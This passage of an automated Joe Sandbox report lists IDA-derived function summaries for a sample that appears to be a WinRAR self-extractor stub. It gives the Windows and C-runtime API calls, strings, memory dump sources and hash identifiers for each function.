                                  • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?), ref: 00D884F4
                                  • Part of subcall function 00D884DE: GetLastError.KERNEL32(?,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?,?), ref: 00D88506
                                • _free.LIBCMT ref: 00D8C28E
                                • _free.LIBCMT ref: 00D8C2A3
                                • _free.LIBCMT ref: 00D8C2AE
                                • _free.LIBCMT ref: 00D8C2D0
                                • _free.LIBCMT ref: 00D8C2E3
                                • _free.LIBCMT ref: 00D8C2F1
                                • _free.LIBCMT ref: 00D8C2FC
                                • _free.LIBCMT ref: 00D8C334
                                • _free.LIBCMT ref: 00D8C33B
                                • _free.LIBCMT ref: 00D8C358
                                • _free.LIBCMT ref: 00D8C370
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: d7769372de81343d0aa6d0594aa901b1b8a197f5eca0ffbc385a8e915c8053f7
                                • Instruction ID: 8a317ce0cc343ebf8d4d210481e155aa35474386f48f57fb16c1bf3e9d4bf8ce
                                • Opcode Fuzzy Hash: d7769372de81343d0aa6d0594aa901b1b8a197f5eca0ffbc385a8e915c8053f7
                                • Instruction Fuzzy Hash: FA315832600605DFEB21BB78D945B5A73EAFF00310F58942AF449D7691DF31AC81AB74
                                APIs
                                • GetWindow.USER32(?,00000005), ref: 00D7CD51
                                • GetClassNameW.USER32(00000000,?,00000800), ref: 00D7CD7D
                                  • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00D7CD99
                                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D7CDB0
                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00D7CDC4
                                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D7CDED
                                • DeleteObject.GDI32(00000000), ref: 00D7CDF4
                                • GetWindow.USER32(00000000,00000002), ref: 00D7CDFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                • String ID: STATIC
                                • API String ID: 3820355801-1882779555
                                • Opcode ID: a38013cb2fee21c0e9bcb3944225ec091f54e87a0246c263211a8debb075d868
                                • Instruction ID: d6edc0a78f94bc6264680fa63eeeecf9e42ba56e179b1774dc59632013e35e78
                                • Opcode Fuzzy Hash: a38013cb2fee21c0e9bcb3944225ec091f54e87a0246c263211a8debb075d868
                                • Instruction Fuzzy Hash: A6113633140712BFE3306B609C0AFAF765CFF44751F04D025FA4AE1192FA60890696B0
                                APIs
                                • _free.LIBCMT ref: 00D88EC5
                                  • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?), ref: 00D884F4
                                  • Part of subcall function 00D884DE: GetLastError.KERNEL32(?,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?,?), ref: 00D88506
                                • _free.LIBCMT ref: 00D88ED1
                                • _free.LIBCMT ref: 00D88EDC
                                • _free.LIBCMT ref: 00D88EE7
                                • _free.LIBCMT ref: 00D88EF2
                                • _free.LIBCMT ref: 00D88EFD
                                • _free.LIBCMT ref: 00D88F08
                                • _free.LIBCMT ref: 00D88F13
                                • _free.LIBCMT ref: 00D88F1E
                                • _free.LIBCMT ref: 00D88F2C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 621770fe92def757de736928e3ccf7dc3ff962ebf6ef0c952ccd80a903dfc15f
                                • Instruction ID: 44000b89cc464163c70a96124b1fa69b8e113c87f7f6097de90fe9f35e21d619
                                • Opcode Fuzzy Hash: 621770fe92def757de736928e3ccf7dc3ff962ebf6ef0c952ccd80a903dfc15f
                                • Instruction Fuzzy Hash: 8811867651010DBFCB11FF58D942CDA3BA6FF04350B9141A5FA088F666DA32EE51EBA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: ;%u$x%u$xc%u
                                • API String ID: 0-2277559157
                                • Opcode ID: 9992cd8c686fb07358685a2b304910dac06918e1eb43cc5294da772fc3d5303d
                                • Instruction ID: c13431a16a2f0fdef1ae0c21e5bc226a113a6a67995432dc6a42de18e928751b
                                • Opcode Fuzzy Hash: 9992cd8c686fb07358685a2b304910dac06918e1eb43cc5294da772fc3d5303d
                                • Instruction Fuzzy Hash: 02F125716087805BDB25EF78C895BFE7799AF94300F0C4469F886CB293DB249948C7B6
                                APIs
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                • EndDialog.USER32(?,00000001), ref: 00D7AD20
                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D7AD47
                                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D7AD60
                                • SetWindowTextW.USER32(?,?), ref: 00D7AD71
                                • GetDlgItem.USER32(?,00000065), ref: 00D7AD7A
                                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D7AD8E
                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D7ADA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: MessageSend$Item$TextWindow$Dialog
                                • String ID: LICENSEDLG
                                • API String ID: 3214253823-2177901306
                                • Opcode ID: 2d4e35d637f849439215cbb3adc8abba8cb2f6c027477652a47dac3005a02dfa
                                • Instruction ID: 12b61c3378df4f9961a679d4c158f9cb0c5c93a7478961a39c82a3bdc1bf2ac3
                                • Opcode Fuzzy Hash: 2d4e35d637f849439215cbb3adc8abba8cb2f6c027477652a47dac3005a02dfa
                                • Instruction Fuzzy Hash: 7921D632244306BBD2315F69EC49E7F3F6CFB8AB46F054015F609D26A0FB519901E632
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D69448
                                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D6946B
                                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D6948A
                                  • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                                • _swprintf.LIBCMT ref: 00D69526
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                • MoveFileW.KERNEL32(?,?), ref: 00D69595
                                • MoveFileW.KERNEL32(?,?), ref: 00D695D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                • String ID: rtmp%d
                                • API String ID: 2111052971-3303766350
                                • Opcode ID: f34aab2d915b1eabfe590eee463f085bb9a0e43db0955372fd835c388de8e0ba
                                • Instruction ID: b95f8ef078a0d0eb75ac830d36de25307219049d4bc8303f19dc7405de3a5c3c
                                • Opcode Fuzzy Hash: f34aab2d915b1eabfe590eee463f085bb9a0e43db0955372fd835c388de8e0ba
                                • Instruction Fuzzy Hash: 23413A71900258A7CF20EBA4CD95AEEB77CEF15380F0444E6B549E3142EB749B89CA74
                                APIs
                                • __aulldiv.LIBCMT ref: 00D70A9D
                                  • Part of subcall function 00D6ACF5: GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                                • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D70AC0
                                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D70AD2
                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D70AE3
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70AF3
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70B03
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D70B3D
                                • __aullrem.LIBCMT ref: 00D70BCB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                • String ID:
                                • API String ID: 1247370737-0
                                • Opcode ID: e542c2159fb6719d17ba4cf4adf29d78fc1477b8305a64b12469db995ddd6e0b
                                • Instruction ID: 808e661694c1ff96392cbce8496cd9c98403f782882dafc32671e27e3ae14dc8
                                • Opcode Fuzzy Hash: e542c2159fb6719d17ba4cf4adf29d78fc1477b8305a64b12469db995ddd6e0b
                                • Instruction Fuzzy Hash: 8B4119B5408306DFC710DF65C88496BFBF8FB88714F048A2EF59692650E735E649CB61
                                APIs
                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00D8F5A2,?,00000000,?,00000000,00000000), ref: 00D8EE6F
                                • __fassign.LIBCMT ref: 00D8EEEA
                                • __fassign.LIBCMT ref: 00D8EF05
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00D8EF2B
                                • WriteFile.KERNEL32(?,?,00000000,00D8F5A2,00000000,?,?,?,?,?,?,?,?,?,00D8F5A2,?), ref: 00D8EF4A
                                • WriteFile.KERNEL32(?,?,00000001,00D8F5A2,00000000,?,?,?,?,?,?,?,?,?,00D8F5A2,?), ref: 00D8EF83
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: 5f572e52770e7976444d9ca203d164716765fa16ded71458868ea9ce7a3a015a
                                • Instruction ID: 532965abf55d4ccf61c6b592921fbc5b4a68323437825c77fa6ac3401b6e99e1
                                • Opcode Fuzzy Hash: 5f572e52770e7976444d9ca203d164716765fa16ded71458868ea9ce7a3a015a
                                • Instruction Fuzzy Hash: 0451B375A00209AFDB10DFA8D885AEEFBF9EF09310F18451AE555E7291E7309941CF70
                                APIs
                                • GetTempPathW.KERNEL32(00000800,?), ref: 00D7C54A
                                • _swprintf.LIBCMT ref: 00D7C57E
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                • SetDlgItemTextW.USER32(?,00000066,00DA946A), ref: 00D7C59E
                                • _wcschr.LIBVCRUNTIME ref: 00D7C5D1
                                • EndDialog.USER32(?,00000001), ref: 00D7C6B2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                • String ID: %s%s%u
                                • API String ID: 2892007947-1360425832
                                • Opcode ID: 65a6795e3ec7705d3aea1f37709e98ce772275fa0cd9bfff84f735f0b5858fff
                                • Instruction ID: 2a9e2a8345c726b48062816c6f9c237d225f27a078b9f68fdae7d6d60a6ed344
                                • Opcode Fuzzy Hash: 65a6795e3ec7705d3aea1f37709e98ce772275fa0cd9bfff84f735f0b5858fff
                                • Instruction Fuzzy Hash: B941C271910618AEDB22DBA0DC85EEA77BCEB09701F0490A6E50DE6160F7719BC4CB70
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00D78F38
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D78F59
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AllocByteCharGlobalMultiWide
                                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                • API String ID: 3286310052-4209811716
                                • Opcode ID: 3b31bcf6e14a3e0743c1dc341a5baf0030b253ecdb93e04c4a42167a34baea59
                                • Instruction ID: 56ea898eb27f1b405496711ec7649006458937e3ca5d322ebae33b4be2c36a88
                                • Opcode Fuzzy Hash: 3b31bcf6e14a3e0743c1dc341a5baf0030b253ecdb93e04c4a42167a34baea59
                                • Instruction Fuzzy Hash: 3C312A315483117FDB24BB649C4AF6FB768EF41720F14811AF809A61D2FF649A0993B1
                                APIs
                                • ShowWindow.USER32(?,00000000), ref: 00D7964E
                                • GetWindowRect.USER32(?,00000000), ref: 00D79693
                                • ShowWindow.USER32(?,00000005,00000000), ref: 00D7972A
                                • SetWindowTextW.USER32(?,00000000), ref: 00D79732
                                • ShowWindow.USER32(00000000,00000005), ref: 00D79748
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Window$Show$RectText
                                • String ID: RarHtmlClassName
                                • API String ID: 3937224194-1658105358
                                • Opcode ID: 45f31c91ce21e714a627fb1594b4737829f2916979b3c8280211bea22ee4c6f2
                                • Instruction ID: a22c8c926259e01866697c93bd7260e6c0bbf12f88f2ea76c1df1de6e3cef535
                                • Opcode Fuzzy Hash: 45f31c91ce21e714a627fb1594b4737829f2916979b3c8280211bea22ee4c6f2
                                • Instruction Fuzzy Hash: EF31AD32004301AFCB25AF64DC49F6BBBA8EF48711F088559FA4D9A262EB34D905CB71
                                APIs
                                  • Part of subcall function 00D8BF79: _free.LIBCMT ref: 00D8BFA2
                                • _free.LIBCMT ref: 00D8C003
                                  • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?), ref: 00D884F4
                                  • Part of subcall function 00D884DE: GetLastError.KERNEL32(?,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?,?), ref: 00D88506
                                • _free.LIBCMT ref: 00D8C00E
                                • _free.LIBCMT ref: 00D8C019
                                • _free.LIBCMT ref: 00D8C06D
                                • _free.LIBCMT ref: 00D8C078
                                • _free.LIBCMT ref: 00D8C083
                                • _free.LIBCMT ref: 00D8C08E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                • Instruction ID: 24080eac5913b0e24b21dc5bc522bfb7bd2588c7ee959b8a1b675921eaf11cb1
                                • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                • Instruction Fuzzy Hash: 741112B2540B44F6D620BBB0CC07FCBB79DEF04710F408856B39966452DB66F9049BB4
                                APIs
                                • GetLastError.KERNEL32(?,?,00D820C1,00D7FB12), ref: 00D820D8
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D820E6
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D820FF
                                • SetLastError.KERNEL32(00000000,?,00D820C1,00D7FB12), ref: 00D82151
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: 32a386eb40fea142044f769a27266429ddbe2741d6d16c9b5eb8dd0b7840dcd0
                                • Instruction ID: be0a174f10fdc03735955a43db90d355221366936be38b2efe15accb6c6eb36e
                                • Opcode Fuzzy Hash: 32a386eb40fea142044f769a27266429ddbe2741d6d16c9b5eb8dd0b7840dcd0
                                • Instruction Fuzzy Hash: F001AC32109711AEF7543BB5BC8993B2B45EB21B747350A2BF218952E1EF614D019374
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                • API String ID: 0-1718035505
                                • Opcode ID: f0be2fc0ff69939f3fc08808ec0ffb5b7cbea050289720b985426161878f34a8
                                • Instruction ID: 5da77717c8d5d1ff1e579263b1765e620a4cb424fe204054418e2bfe5df3041a
                                • Opcode Fuzzy Hash: f0be2fc0ff69939f3fc08808ec0ffb5b7cbea050289720b985426161878f34a8
                                • Instruction Fuzzy Hash: B001F4316413239B4F725E756D816A637B6AE85312328817BE64DD3300FAB2C885D7F0
                                APIs
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70D0D
                                  • Part of subcall function 00D6ACF5: GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                                • LocalFileTimeToFileTime.KERNEL32(?,00D70CB8), ref: 00D70D31
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D70D47
                                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D70D56
                                • SystemTimeToFileTime.KERNEL32(?,00D70CB8), ref: 00D70D64
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70D72
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
